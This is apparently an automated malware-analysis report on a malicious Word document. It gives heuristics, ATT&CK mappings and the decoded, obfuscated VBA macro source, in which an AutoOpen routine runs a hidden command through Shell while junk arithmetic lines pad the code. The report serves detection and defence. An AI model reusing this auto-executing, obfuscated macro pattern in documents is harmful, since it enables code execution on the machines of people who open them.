MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers the execution of the 'NRGtcHFQ' function, which contains a critical 'Shell()' call. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The presence of 'SC_STR_CMD' and 'OLE_VBA_SHELL' heuristics further supports this malicious behavior.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6781496-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6781496-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(VnhqJLjbH, rHfRiTnPt), rpwzQ) Set PPDzQHNHzvLnNVjaUGwt = DqblwGnjzRrEbKMYljVjZk -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() NRGtcHFQ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocPIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8734 bytes |
SHA-256: be39ce2d3e3edbe602789ffa98c05669c67174fd383c27b28241b3b44b77fc8b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
241 of 274 identifiers look randomly generated (e.g. 'ihukDzZiWzwXBBwRwfjoGLIN') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "AuapWicMiTR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
NRGtcHFQ
End Sub
Attribute VB_Name = "jwjbwdvRmtdZD"
Function NRGtcHFQ()
On Error Resume Next
Set QzVidFSRLJJIwCd = UhZEZNruGbMllZOMOJlj
mijFJwZiZKhDNHJwi = Sqr(DGbYBshjmvzumQwPhDszQ)
RLjRfhYREPkZhamOc = 258868852 * Oct(dKikfXQGzZGDiUmpPrk) * 89032365 * HUriJNjWdSaFbmGnbBtPbbsw - (77091548 + CLng(FvlXXsZYVqnCVJh) * 238525842 * CBool(131546825))
fwChfBnpqwYfctW = ChrW(HnlFvifDRQzZfj)
Set fEDaDFtOhnrtZUuD = BhUXvKTSWTWPSWz
wROvpLwUvYcpiRGOwbVUBpk = Sqr(kIjmXwPRuBbCjHSqkAbWhdn)
NIRqAcqIhULjfKz = 324310381 * Oct(LucqDhqIfjBONMG) * 141191382 * YPhYQRLTVMvmKaCiNWj - (70118463 + CLng(KaaiVtouTHEKElhQk) * 309546375 * CBool(190376364))
WhVuVUIwjzqXKMOpG = ChrW(vYWZCErbGpVOdbGtscEfMA)
Set mbSmQMpzCQiYlHjPFQNjwfuS = BBQmoPRZnwwLHXTYlktsqjUV
VllLBHhAnPLZKOARww = Sqr(kDzstKLuAZIUjvS)
dfOmqQLUHHzaVsbsi = 74287483 * Oct(QXssBpMjaivfdsvXljLST) * 290737586 * llKlYIzQlVLCuknNwdjl - (276917799 + CLng(cWhaVqIWsQYuHGqE) * 261507827 * CBool(160780067))
NJKSqAmzWPojGnYJoDwn = ChrW(IPcudAdhWsqLIcD)
Set mYJjfiZaclkFISvNESp = jIhmJJzGOfjjzwMmM
EhzillWTGuwjfBB = Sqr(tdqWaVfTLzFEHJFJBwNIQ)
XvQpDFIhziiMEi = 314700982 * Oct(ijBfSnjSMwooijotUrGvGl) * 115998388 * LdzaZuFXNLOdGkjjOzd - (51553920 + CLng(TCQqlsMbAjwRbUpqF) * 295605155 * CBool(114706381))
RbSVKnjIXjIHJJsahkoCsv = ChrW(cRMiQusIELRwsjuf)
Set cEMnjjnAwTcdtq = oqrZvWsPGcXWQNWJfUobt
ihukDzZiWzwXBBwRwfjoGLIN = Sqr(mZJzJFOntMJiLSsqXGa)
sLUNNWJsEpTZhMQZPlM = 290301401 * Oct(jIpnmmMqwiEimfbFwjnvW) * 229092235 * skwwBSamtisICf - (171204148 + CLng(jwBGHOqvhpUTCZwLAEw) * 19812840 * CBool(275206463))
KXXvLAtWYaWHDzUcwitBRM = ChrW(HkUmhHziWlvliiLDqBLQuzuV)
Set UNiuGlWNLnIjtwEibaPMVL = HAmwlvqDsciUKMHljudYDM
zLFkDzYbUIZauTnlRUjQGKcu = Sqr(TpiSrnluBomjLnDTB)
LklNRtJMDTwsnjKS = 237151605 * Oct(qJdVojsiAEGjfzFw) * 111912317 * jFXoJijRwIADVtDt - (189152741 + CLng(kpwFUmsEFWoznrSAmimBzzm) * 149165385 * CBool(225705729))
iziNdlUNMbMbkkvEZMdzU = ChrW(lVHZHaskDaWlIvV)
Set jIloYkFETBGtZFMsFTOUrS = KYYYYQtGQdoRbviBjoZa
pljPkSYNYBwQbbPAMhoa = Sqr(pQkolzbRifRsBUnrInzUtsc)
AzTOBXHlzkAVwbzUzvtVfYa = 48659916 * Oct(JDuqFCzotnliMQHYjtQT) * 117661255 * jndXzwGMcZMmrTNutiDhCoO - (278718846 + CLng(imzzfJnKOWGNiEwhhLLSZ) * 162582956 * CBool(264662602))
lziQkssZmmSMJMzQ = ChrW(bdwGhLiEzVcCYLGzlOf)
Set pCzYMjBfWrGoQCVFWrYWilcl = kZlalOaLIGBMRmFoESX
JHljMdVDSSEZMzc = Sqr(QEldjdHvTtEETiaS)
fPcnBOIsWsqBbA = 117727492 * Oct(vYAhuZfAqPTYQkjr) * 248277590 * jjAWOqckKkQtstmuXK - (175286312 + CLng(KFkczmujclIzQGTiKZJJF) * 67138309 * CBool(103241983))
jwXZlWNZQALbzYYcvsIYbRdl = ChrW(EkzAQjzposBPVwFYiiP)
Set iVQTIJiujFXGiUoRzrbiE = QLnUHwANnqEoiEdirjATGdz
RzNCwGssikEFjnCktWShCqm = Sqr(nQAsilnnNvCJkwOjzMJwz)
CDjQZkKQpbKiPhGAJtw = 113840493 * Oct(klsAvHlkqjojOOwLSLDczFb) * 331788306 * jhawCPBijRSnPdc - (168554324 + CLng(zuWuATKprhsouiKutMaK) * 257237829 * CBool(263279466))
mBiwdXCibDRGjbLjO = ChrW(HKiIummItWRCOtLdk)
Const rHfRiTnPt = 0
Set KrWLozOLMTYYAVwGsznZi = YLuKVBPkPBHqoZSpMIEOuwUs
fRAlPXhCMTKQiiNvbEW = Sqr(KhXnDkfVQDbrBkpjO)
AianbGHYidqSSrzbPzuNiisL = 248912446 * Oct(rTOtodhcEsqXGRfi) * 11528875 * iwkjtaVsoAQVlO - (12193482 + CLng(OoKppNkpnFlsrdhDd) * 285123233 * CBool(220438253))
ZIZoYwohMjHbVpCqUMLRNv = ChrW(opdBLSNsuhOrGOVQtYDdEwJW)
Set CwcaUwVnfFQquGMtHCuZB = jCjCBBIznmzUbQHtrXt
opDwBmacHwiticOauSz = Sqr(fhSdsaivlNKWfcluwh)
ObfprDElzChwZa = 166182967 * Oct(HXaGaHirulMNGqUcNRjszra) * 174986230 * oftDOkwGiiWYbaGzovFqrf - (59498649 + CLng(ElHqjuPwzRmcknfBQGXLz) * 27954117 * CBool(252541721))
dvKwVjzJWLwddGZoOaYJndM = ChrW(QEakIzkAzPMljT)
Set AMVWLMCZoJGIcjzqXKQ = dBXWotcvzQlrHbYOcIBhlfH
BfirqVrVAMwzpwhSkHbXXPB = Sqr(HiNOIiGztjUILk)
cYPqufZZiaiwdD = 236677244 * Oct(mihjIHdNSGwFIdYHzD) * 334852152 * IYGViJjnZlctJNhidAwVvCYn - (218604506 + CLng(QACbzaFlKOXLBzXpnj) * 199255604 * CBool(27896539))
uwtdzHdCFzSoOsilwoBoYDTH = ChrW(zwzGPsJcYVEIzzTbi)
VnhqJLjbH = AuapWicMiTR.TextBox1 + XnGoD + cPWrcmLz + wqHJLpX + AqiNqwE + MpJCaAhN + bVmzIwm + AtCjtYjR + vMzjK + VtQGbz + DGOsaQDk
Set mRJAUtimpKmvoTDQsHNrUa = aaKmkZEaUticsjGzfYjvRXj
PWziKQPUMZjaKHwNljSCJr = Sqr(klHhSniaDuWWObZQ)
dKQTwjpYaSJhFd = 197480111 * Oct(LNtDjwjhwfjnkkmMTOZ) * 334325266 * qnERIsUUswQswDNjNTj - (200904017 + CLng(VRABoqjzOqEfzUZolaELN) * 36052836 * CBool(221990081))
vlhYfGvsUrVWEQUBo = ChrW(iIMNAinsbtcTVQjlGC)
Set EHhpIwiiBrljWzczjb = waHCltaEfHbbwGwuDpsYG
zAhSbsiffzpcfswEvwirwXaP = Sqr(dYCYIrCdzdHVTRhaAcblWa)
wzuvqOzZaRfwTbH = 151930296 * Oct(nzhPpicfARwvwiQ) * 18416651 * DZNvMOwDjEnSNwsFTw - (155498578 + CLng(qJQSQpzBicnPvAXiJMbkjMI) * 203062514 * CBool(269848247))
mSFqifsKcuJvfWRz = ChrW(DQXWMbKvHXnIdBldDDi)
Set FsrhLoGowjnLhqXvZwKjwC = zlqOoBjdwtmTEjWnMzTK
ljsuKrUohAsCLu = Sqr(VaSmSDoRuWSOCLzjdsjMEzTi)
LoRtuQsmaSlhjswz = 101570401 * Oct(YrdSdjQPKihrXHncGPXXAFZc) * 188319234 * LCwAkOpAumjtKhcfGNEiuit - (28212119 + CLng(harzSRApjXOSKuTCXMBwN) * 28865152 * CBool(275133064))
UzLXuzhIrOCozCbUfDbJOMw = ChrW(lfXSsIYckwcTGdvkqF)
Set kIGnZvfpJhZRLYictwJkt = QLmJrlEMDfpOziYNp
qQdljAhHbtTDsKq = Sqr(suAPEukziubwYzEfGE)
dniclcjJKsAmfXjmdMZBwfj = 51066699 * Oct(ZkjcoowoRNjOSOnUkaEdHw) * 165296134 * NbSjDwzHWmMsAhVEDwOKzXK - (328674427 + CLng(jMFbdhdLrONVQkUPYrjCvT) * 19126804 * CBool(28861696))
aJhOrpQUuWkrfsEjjJSHinNu = ChrW(ajivrMJBbCYvwzZzAVOjXtw)
Set dmztbwRjZkBuFlfk = zEQEktKMwqljIw
HNpACrdKjBPNjo = Sqr(jolowSuItspjfIfDQn)
nswfiKWuhDVjaY = 184801117 * Oct(zuUzhMFvHMKzCDww) * 172310886 * AbkICdaYNFYMPIDwiIwnT - (176300633 + CLng(AXVzYriFWGrXAZosqZJzzX) * 309894409 * CBool(325181827))
uDVpCmOZojkjdC = ChrW(jABGXlDZtQFOKbnccYzd)
Set jIbpqESaFucRNAlNYWCRfoY = EscZAjFrBMcirTuvIjVHF
dNOqswOvLrjulwcsZVplPBY = Sqr(WEbGJwTRcJOOKJ)
GcGAlzwhwSQHzRUfbpMUnXH = 250958078 * Oct(XSSbkOhQdjIJAmDZ) * 151420011 * ntrTzIimZwpEjUUoOjiG - (78044946 + CLng(iqWiLVaCJuQsUsV) * 23040309 * CBool(127960818))
zzojbZznpMYWuQTi = ChrW(AzQwILXounrAbTKN)
Set djiuMYbiLoKZlSK = zZGCBbPXNFbwPwHOowLvj
QkvzKMcItYwCiXCjGCQKh = Sqr(zdONhvlnHPBOJVG)
QCvEMDzNPjMFsJ = 198608703 * Oct(DKnRjzfjXFRjAUOjcCl) * 91751350 * cttiAzzijvzlcKzio - (132898186 + CLng(XPhGmPNvUjcpYQKbQt) * 261849444 * CBool(228514147))
hwrKTwXKPwniSq = ChrW(unHOnCcBDFZVSijoAlSqQqwS)
Set twEKHUcwEiLakSUPc = rTSVjFVoMnYsmzqXUvJ
TncUICpHnKdiZUvwwXOwoSHo = Sqr(LwNjNzZFdGErwNhQNAB)
uSSBsawjKKAfntwF = 184559121 * Oct(aNDYwNrGwKhiaRGijt) * 197770610 * rmAtvSFYEEQboqao - (44508647 + CLng(VEKlcmwbjjZJNDbQfo) * 83609952 * CBool(68915496))
iHSCuuFukrRXKXZBGKOu = ChrW(iWzuqNAXKlcwsrwrjh)
lFipHFZKj = Array(lZvwEwo, tdEbj, mwzAj, Interaction _
_
_
_
_
_
_
_
.Shell(VnhqJLjbH, rHfRiTnPt), rpwzQ)
Set PPDzQHNHzvLnNVjaUGwt = DqblwGnjzRrEbKMYljVjZk
PSMMQzFANNrLYbORAZXzd = Sqr(jmKUBjZcJNTIMTluXk)
RiqjznwXOVKCmEviaBwzWbk = 27639430 * Oct(sPPvfGBnCMpsDLjELKHw) * 73630971 * ERkLsbmYptmEHYhcjOIP - (237580382 + CLng(FpXpQtKQdFTLLwKUNaAiWvG) * 332099660 * CBool(29932911))
XjbspvwLLvnDLtO = ChrW(QjlvNjROBiOFWJjZlIW)
Set ZiUiWKZwbVmNqOrmNvzoh = uwrpdTQtQitpDGuqEzPp
tWuiASfdqinBwnWmhjFiiEDT = Sqr(LlrXqBYshBbzKc)
kQZAGnGSYDXQKG = 86009194 * Oct(TbdpjoGAjOJPmupWDDwSfC) * 85453647 * ETTTTkOlUNHVhnUv - (66372024 + CLng(UrdrjdNANGHuJQOPkNV) * 251002841 * CBool(214680484))
AYuYnUpQiCIFiVjNmpGTXIdZ = ChrW(rGRCHaXsYrFwHq)
Set SIqZiJLcNiIduIqYKlCSsMj = NzIzchqOizpYAQWCCpp
fHlJXHDLAPzFYOLiBMzjrt = Sqr(vSRYtOzQDXuwGOzcVifOOAjA)
EsBppIzlIqqGiJzAwwiiS = 39282750 * Oct(CkiCLfjujRnoWwaNO) * 318366974 * zYJWmUiNPEBVTwbz - (35723368 + CLng(GlGYvHovUaCYiTiH) * 53660337 * CBool(288885746))
OshdRUqhwTquzVBIKEZcBhq = ChrW(HLrVimMqkGrTYIoEEZsbijDD)
Set fAzLbmufmiwcCqXPBGvjREw = ViUmzmjuhrhJiSp
EiWtnwkJlwjXkObaDrqtSIf = Sqr(wCvKJNljRDciiDUYzKABCLJT)
GFmcvZvDWukBZAXNA = 38287874 * Oct(lsrAWRvIIiwnsbuCIwHW) * 200460291 * fMJjXYJcoBFchYOFPKAQm - (165259437 + CLng(GsZfzPOtjCEMfrnuXwj) * 276095883 * CBool(309829962))
PuVnCjwWNuGmCrzsMMZIW = ChrW(dLjOcQcSGjiZcfJJNiz)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.